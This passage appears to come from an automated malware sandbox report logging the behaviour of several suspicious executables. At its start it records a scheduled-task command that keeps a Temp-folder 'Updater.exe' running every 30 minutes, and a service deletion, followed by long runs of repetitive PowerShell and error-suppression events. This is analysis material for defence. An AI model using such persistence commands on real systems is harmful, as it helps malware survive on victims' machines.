                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                        Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "UTIXDCVF"

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\25C1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
